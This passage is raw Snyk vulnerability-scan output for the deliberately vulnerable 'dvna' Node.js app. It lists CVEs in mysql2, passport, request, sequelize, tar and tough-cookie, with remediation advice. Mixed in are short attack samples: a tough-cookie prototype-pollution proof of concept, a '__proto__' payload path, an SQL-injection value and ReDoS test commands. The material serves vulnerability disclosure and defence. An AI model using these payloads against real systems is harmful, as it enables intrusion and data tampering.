attacker can control the value of “pathâ€, they can set this value to `__proto__.myValue`. `myValue` is then assigned to the prototype of the class of the object.\n\n# Types of attacks\n\nThere are a few methods by which Prototype Pollution can be manipulated:\n\n| Type |Origin |Short description |\n|--|--|--|\n| **Denial of service (DoS)**|Client |This is the most likely attack. \u003cbr\u003eDoS occurs when `Object` holds generic functions that are implicitly called for various operations (for example, `toString` and `valueOf`). \u003cbr\u003e The attacker pollutes `Object.prototype.someattr` and alters its state to an unexpected value such as `Int` or `Object`. In this case, the code fails and is likely to cause a denial of service. \u003cbr\u003e**For example:** if an attacker pollutes `Object.prototype.toString` by defining it as an integer, if the codebase at any point was reliant on `someobject.toString()` it would fail. |\n |**Remote Code Execution**|Client|Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.\u003cbr\u003e**For example:** `eval(someobject.someattr)`. In this case, if the attacker pollutes `Object.prototype.someattr` they are likely to be able to leverage this in order to execute code.|\n|**Property Injection**|Client|The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.\u003cbr\u003e **For example:** if a codebase checks privileges for `someuser.isAdmin`, then when the attacker pollutes `Object.prototype.isAdmin` and sets it to equal `true`, they can then achieve admin privileges.|\n\n# Affected environments\n\nThe following environments are susceptible to a Prototype Pollution attack:\n\n- Application server\n \n- Web server\n\n- Web browser\n \n\n# How to prevent\n\n1. Freeze the prototype— use `Object.freeze (Object.prototype)`.\n \n2. Require schema validation of JSON input.\n \n3. Avoid using unsafe recursive merge functions.\n \n4. Consider using objects without prototypes (for example, `Object.create(null)`), breaking the prototype chain and preventing pollution.\n \n5. As a best practice use `Map` instead of `Object`.\n\n## For more information on this vulnerability type:\n\n[Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.†GitHub, 26 May 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n\n# Remediation\nUpgrade `mysql2` to version 3.9.8 or higher.\n# References\n- [GitHub Commit](https://github.com/sidorares/node-mysql2/commit/efe3db527a2c94a63c2d14045baba8dfefe922bc)\n- [GitHub Gist](https://gist.github.com/domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a)\n- [GitHub PR](https://github.com/sidorares/node-mysql2/pull/2702)\n"},"properties":{"cvssv3_baseScore":8.2,"security-severity":"8.2","tags":["security","CWE-1321","npm"]}} + Message: This file introduces a vulnerable mysql2 package with a high severity vulnerability.Bunknown‡ + +package.json:1-1SNYK-JS-PASSPORT-2840631XThis file introduces a vulnerable passport package with a medium severity vulnerability. :óMatchedRule: {"id":"SNYK-JS-PASSPORT-2840631","shortDescription":{"text":"Medium severity - Session Fixation vulnerability in passport"},"fullDescription":{"text":"(CVE-2022-25896) passport@0.4.1"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: passport\n* Introduced through: dvna@0.0.1 and passport@0.4.1\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › passport@0.4.1\n# Overview\n[passport](https://www.npmjs.org/package/passport) is a Simple, unobtrusive authentication for Node.js.\n\nAffected versions of this package are vulnerable to Session Fixation. When a user logs in or logs out, the session is regenerated instead of being closed.\n# Remediation\nUpgrade `passport` to version 0.6.0 or higher.\n# References\n- [GitHub Commit](https://github.com/jaredhanson/passport/commit/7e9b9cf4d7be02428e963fc729496a45baeea608)\n- [GitHub PR](https://github.com/jaredhanson/passport/pull/900)\n"},"properties":{"cvssv3_baseScore":4.8,"security-severity":"4.8","tags":["security","CWE-384","npm"]}} + Message: This file introduces a vulnerable passport package with a medium severity vulnerability.Bunknownœ +package.json:1-1SNYK-JS-REQUEST-3361831WThis file introduces a vulnerable request package with a medium severity vulnerability. :Š MatchedRule: {"id":"SNYK-JS-REQUEST-3361831","shortDescription":{"text":"Medium severity - Server-side Request Forgery (SSRF) vulnerability in request"},"fullDescription":{"text":"(CVE-2023-28155) request@2.88.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: request\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › request@2.88.2\n# Overview\n[request](https://www.npmjs.com/package/request) is a simplified http request client.\n\nAffected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the `lib/redirect.js` file by allowing insecure redirects in the default configuration, via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).\r\n\r\n**NOTE:** `request` package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.\n# Remediation\nA fix was pushed into the `master` branch but not yet published.\n# References\n- [GitHub Commit](https://github.com/request/request/commit/d42332182512e56ba68446f49c3e3711e04301a2)\n- [GitHub Issue](https://github.com/request/request/issues/3442)\n- [GitHub PR](https://github.com/request/request/pull/3444)\n"},"properties":{"cvssv3_baseScore":6.5,"security-severity":"6.5","tags":["security","CWE-918","npm"]}} + Message: This file introduces a vulnerable request package with a medium severity vulnerability.Bunknown‹ +package.json:1-1SNYK-JS-SEQUELIZE-2932027[This file introduces a vulnerable sequelize package with a critical severity vulnerability. :ó MatchedRule: {"id":"SNYK-JS-SEQUELIZE-2932027","shortDescription":{"text":"Critical severity - SQL Injection vulnerability in sequelize"},"fullDescription":{"text":"(CVE-2023-25813) sequelize@4.44.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to SQL Injection via the `replacements` statement. It allowed a malicious actor to pass dangerous values such as `OR true; DROP TABLE` users through replacements which would result in arbitrary SQL execution.\n# Remediation\nUpgrade `sequelize` to version 6.19.1 or higher.\n# References\n- [Github Issues](https://github.com/sequelize/sequelize/issues/14519)\n- [Github Releases](https://github.com/sequelize/sequelize/releases/tag/v6.19.1)\n"},"properties":{"cvssv3_baseScore":9.4,"security-severity":"9.4","tags":["security","CWE-89","npm"]}} + Message: This file introduces a vulnerable sequelize package with a critical severity vulnerability.BunknownÍ + +package.json:1-1SNYK-JS-SEQUELIZE-2959225WThis file introduces a vulnerable sequelize package with a high severity vulnerability. :¹ MatchedRule: {"id":"SNYK-JS-SEQUELIZE-2959225","shortDescription":{"text":"High severity - SQL Injection vulnerability in sequelize"},"fullDescription":{"text":"sequelize@4.44.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to SQL Injection due to an improper escaping for multiple appearances of `$` in a string.\n# Remediation\nUpgrade `sequelize` to version 6.21.2 or higher.\n# References\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/7bb60e3531127da684cc1f75307410c53dfc9c8c)\n- [GitHub Issue](https://github.com/sequelize/sequelize/issues/14601)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/14678)\n"},"properties":{"cvssv3_baseScore":7,"security-severity":"7","tags":["security","CWE-89","npm"]}} + Message: This file introduces a vulnerable sequelize package with a high severity vulnerability.Bunknownà +package.json:1-1SNYK-JS-SEQUELIZE-3324088WThis file introduces a vulnerable sequelize package with a high severity vulnerability. :Ì MatchedRule: {"id":"SNYK-JS-SEQUELIZE-3324088","shortDescription":{"text":"High severity - Improper Filtering of Special Elements vulnerability in sequelize"},"fullDescription":{"text":"(CVE-2023-22578) sequelize@4.44.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Improper Filtering of Special Elements due to attributes not being escaped if they included `(` and `)`, or were equal to `*` and were split if they included the character `.`.\n# Remediation\nUpgrade `sequelize` to version 6.29.0 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/CVE-2023-22578)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/344c404eac7393fd5d460cb65eca835c764763d2)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15374)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15710)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n"},"properties":{"cvssv3_baseScore":8.3,"security-severity":"8.3","tags":["security","CWE-790","npm"]}} + Message: This file introduces a vulnerable sequelize package with a high severity vulnerability.Bunknownª +package.json:1-1SNYK-JS-SEQUELIZE-3324089YThis file introduces a vulnerable sequelize package with a medium severity vulnerability. :” MatchedRule: {"id":"SNYK-JS-SEQUELIZE-3324089","shortDescription":{"text":"Medium severity - Information Exposure vulnerability in sequelize"},"fullDescription":{"text":"(CVE-2023-22580) sequelize@4.44.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Information Exposure due to improper user-input, by allowing an attacker to create malicious queries leading to SQL errors.\n# Remediation\nUpgrade `sequelize` to version 6.28.1 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/DIVD-2022-00020/)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/6c71dbd6a224f77955cb17eab982cef1c44ed521)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15375)\n- [GitHub PR Backport](https://github.com/sequelize/sequelize/pull/15699)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n"},"properties":{"cvssv3_baseScore":5.3,"security-severity":"5.3","tags":["security","CWE-200","npm"]}} + Message: This file introduces a vulnerable sequelize package with a medium severity vulnerability.Bunknownò +package.json:1-1SNYK-JS-SEQUELIZE-3324090YThis file introduces a vulnerable sequelize package with a medium severity vulnerability. :Ü MatchedRule: {"id":"SNYK-JS-SEQUELIZE-3324090","shortDescription":{"text":"Medium severity - Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in sequelize"},"fullDescription":{"text":"(CVE-2023-22579) sequelize@4.44.4"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: sequelize\n* Introduced through: dvna@0.0.1 and sequelize@4.44.4\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › sequelize@4.44.4\n# Overview\n[sequelize](http://docs.sequelizejs.com/) is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.\n\nAffected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') due to improper user-input sanitization, due to unsafe fall-through in `GET WHERE` conditions.\n# Remediation\nUpgrade `sequelize` to version 6.28.1 or higher.\n# References\n- [DIVD CSIRT](https://csirt.divd.nl/CVE-2023-22579)\n- [GitHub Commit](https://github.com/sequelize/sequelize/commit/6c71dbd6a224f77955cb17eab982cef1c44ed521)\n- [GitHub PR](https://github.com/sequelize/sequelize/pull/15375)\n- [GitHub PR Backport](https://github.com/sequelize/sequelize/pull/15699)\n- [GitHub Release](https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20)\n"},"properties":{"cvssv3_baseScore":6.3,"security-severity":"6.3","tags":["security","CWE-843","npm"]}} + Message: This file introduces a vulnerable sequelize package with a medium severity vulnerability.BunknownÆ +package.json:1-1SNYK-JS-TAR-1536528QThis file introduces a vulnerable tar package with a high severity vulnerability. :¾MatchedRule: {"id":"SNYK-JS-TAR-1536528","shortDescription":{"text":"High severity - Arbitrary File Overwrite vulnerability in tar"},"fullDescription":{"text":"(CVE-2021-32803) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Overwrite. This is due to insufficient symlink protection.\r\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic is insufficient when extracting tar files that contain both a directory and a symlink with the same name as the directory. This order of operations results in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to `mkdir` for that directory are skipped.\r\nHowever, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it is possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location.\n# Remediation\nUpgrade `tar` to version 3.2.3, 4.4.15, 5.0.7, 6.1.2 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/9dbdeb6df8e9dbd96fa9e84341b9d74734be6c20)\n"},"properties":{"cvssv3_baseScore":8.2,"security-severity":"8.2","tags":["security","CWE-22","npm"]}} + Message: This file introduces a vulnerable tar package with a high severity vulnerability.Bunknown± +package.json:1-1SNYK-JS-TAR-1536531QThis file introduces a vulnerable tar package with a high severity vulnerability. :©MatchedRule: {"id":"SNYK-JS-TAR-1536531","shortDescription":{"text":"High severity - Arbitrary File Overwrite vulnerability in tar"},"fullDescription":{"text":"(CVE-2021-32804) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Overwrite. This is due to insufficient absolute path sanitization.\r\n\r\n`node-tar` aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example, the path `/home/user/.bashrc` would turn into `home/user/.bashrc`.\r\n\r\nThis logic is insufficient when file paths contain repeated path roots such as `////home/user/.bashrc`. `node-tar` only strips a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) still resolves to an absolute path.\n# Remediation\nUpgrade `tar` to version 3.2.2, 4.4.14, 5.0.6, 6.1.1 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/1f036ca23f64a547bdd6c79c1a44bc62e8115da4)\n"},"properties":{"cvssv3_baseScore":8.2,"security-severity":"8.2","tags":["security","CWE-22","npm"]}} + Message: This file introduces a vulnerable tar package with a high severity vulnerability.Bunknownœ, +package.json:1-1SNYK-JS-TAR-1536758PThis file introduces a vulnerable tar package with a low severity vulnerability. :•+MatchedRule: {"id":"SNYK-JS-TAR-1536758","shortDescription":{"text":"Low severity - Regular Expression Denial of Service (ReDoS) vulnerability in tar"},"fullDescription":{"text":"tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). When stripping the trailing slash from `files` arguments, the `f.replace(/\\/+$/, '')` performance of this function can exponentially degrade when `f` contains many `/` characters resulting in ReDoS. \r\n\r\nThis vulnerability is not likely to be exploitable as it requires that the untrusted input is being passed into the `tar.extract()` or `tar.list()` array of entries to parse/extract, which would be unusual.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n# Remediation\nUpgrade `tar` to version 6.1.4, 5.0.8, 4.4.16 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/06cbde5935aa7643f578f874de84a7da2a74fe3a)\n- [GitHub Commit](https://github.com/npm/node-tar/commit/adf35115dbc6e7a479fe3c38f859baf6ffff7a7a)\n- [GitHub Commit](https://github.com/npm/node-tar/commit/d3d5a4e4560f18131e64fc62f5a281b238ef2ecf)\n"},"properties":{"cvssv3_baseScore":3.7,"security-severity":"3.7","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable tar package with a low severity vulnerability.BunknownÅ +package.json:1-1SNYK-JS-TAR-1579147QThis file introduces a vulnerable tar package with a high severity vulnerability. :½MatchedRule: {"id":"SNYK-JS-TAR-1579147","shortDescription":{"text":"High severity - Arbitrary File Write vulnerability in tar"},"fullDescription":{"text":"(CVE-2021-37701) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic was insufficient when extracting `tar` files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators. However, `\\` is a valid filename character on posix systems.\r\n\r\nBy first creating a directory, and then replacing that directory with a symlink, it is possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted `tar` file to symlink into an arbitrary location. This can lead to extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\r\n\r\nAdditionally, a similar confusion could arise on case-insensitive filesystems. If a `tar` archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created.\n# Remediation\nUpgrade `tar` to version 6.1.7, 5.0.8, 4.4.16 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/53602669f58ddbeb3294d7196b3320aaaed22728)\n"},"properties":{"cvssv3_baseScore":8.5,"security-severity":"8.5","tags":["security","CWE-22","npm"]}} + Message: This file introduces a vulnerable tar package with a high severity vulnerability.Bunknown¦ +package.json:1-1SNYK-JS-TAR-1579152QThis file introduces a vulnerable tar package with a high severity vulnerability. :žMatchedRule: {"id":"SNYK-JS-TAR-1579152","shortDescription":{"text":"High severity - Arbitrary File Write vulnerability in tar"},"fullDescription":{"text":"(CVE-2021-37712) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\r\n\r\nThis logic is insufficient when extracting `tar` files that contain two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts.\r\nA specially crafted `tar` archive can include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. This leads to bypassing `node-tar` symlink checks on directories, essentially allowing an untrusted `tar` file to symlink into an arbitrary location and extracting arbitrary files into that location.\n# Remediation\nUpgrade `tar` to version 6.1.9, 5.0.10, 4.4.18 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455)\n"},"properties":{"cvssv3_baseScore":8.5,"security-severity":"8.5","tags":["security","CWE-22","npm"]}} + Message: This file introduces a vulnerable tar package with a high severity vulnerability.BunknownÌ +package.json:1-1SNYK-JS-TAR-1579155QThis file introduces a vulnerable tar package with a high severity vulnerability. :ÄMatchedRule: {"id":"SNYK-JS-TAR-1579155","shortDescription":{"text":"High severity - Arbitrary File Write vulnerability in tar"},"fullDescription":{"text":"(CVE-2021-37713) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Arbitrary File Write. `node-tar` aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory.\r\n\r\nThis logic is insufficient on Windows systems when extracting `tar` files that contain a path that is not an absolute path, but specify a drive letter different from the extraction target, such as `C:some\\path`. If the drive letter does not match the extraction target, for example `D:\\extraction\\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` resolves against the current working directory on the `C:` drive, rather than the extraction target directory.\r\n\r\nAdditionally, a `..` portion of the path can occur immediately after the drive letter, such as `C:../foo`, and is not properly sanitized by the logic that checks for `..` within the normalized and split portions of the path.\r\n\r\n**Note:** This only affects users of `node-tar` on Windows systems.\n# Remediation\nUpgrade `tar` to version 6.1.9, 5.0.10, 4.4.18 or higher.\n# References\n- [GitHub Commit](https://github.com/npm/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598)\n"},"properties":{"cvssv3_baseScore":8.5,"security-severity":"8.5","tags":["security","CWE-22","npm"]}} + Message: This file introduces a vulnerable tar package with a high severity vulnerability.Bunknownº +package.json:1-1SNYK-JS-TAR-6476909SThis file introduces a vulnerable tar package with a medium severity vulnerability. :° MatchedRule: {"id":"SNYK-JS-TAR-6476909","shortDescription":{"text":"Medium severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in tar"},"fullDescription":{"text":"(CVE-2024-28863) tar@2.2.2"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tar\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar@2.2.2\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › tar-pack@3.4.1 › tar@2.2.2\n# Overview\n[tar](https://www.npmjs.com/package/tar) is a full-featured Tar for Node.js.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to the lack of folders count validation during the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running the software and even crash the client within few seconds of running it using a path with too many sub-folders inside.\n# Remediation\nUpgrade `tar` to version 6.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7)\n"},"properties":{"cvssv3_baseScore":6.5,"security-severity":"6.5","tags":["security","CWE-400","npm"]}} + Message: This file introduces a vulnerable tar package with a medium severity vulnerability.Bunknown³8 +package.json:1-1SNYK-JS-TOUGHCOOKIE-5672873\This file introduces a vulnerable tough-cookie package with a medium severity vulnerability. :˜7MatchedRule: {"id":"SNYK-JS-TOUGHCOOKIE-5672873","shortDescription":{"text":"Medium severity - Prototype Pollution vulnerability in tough-cookie"},"fullDescription":{"text":"(CVE-2023-26136) tough-cookie@2.5.0"},"help":{"text":"","markdown":"* Package Manager: npm\n* Vulnerable module: tough-cookie\n* Introduced through: dvna@0.0.1, bcrypt@1.0.3 and others\n### Detailed paths\n* _Introduced through_: dvna@0.0.1 › bcrypt@1.0.3 › node-pre-gyp@0.6.36 › request@2.88.2 › tough-cookie@2.5.0\n# Overview\n[tough-cookie](https://www.npmjs.com/package/tough-cookie) is a RFC6265 Cookies and CookieJar module for Node.js.\n\nAffected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in `rejectPublicSuffixes=false` mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.\n# PoC\n```\r\n// PoC.js\r\nasync function main(){\r\nvar tough = require(\"tough-cookie\");\r\nvar cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});\r\n// Exploit cookie\r\nawait cookiejar.setCookie(\r\n \"Slonser=polluted; Domain=__proto__; Path=/notauth\",\r\n \"https://__proto__/admin\"\r\n);\r\n// normal cookie\r\nvar cookie = await cookiejar.setCookie(\r\n \"Auth=Lol; Domain=google.com; Path=/notauth\",\r\n \"https://google.com/\"\r\n);\r\n\r\n//Exploit cookie\r\nvar a = {};\r\nconsole.log(a[\"/notauth\"][\"Slonser\"])\r\n}\r\nmain();\r\n```\n\n# Details\n\nPrototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability 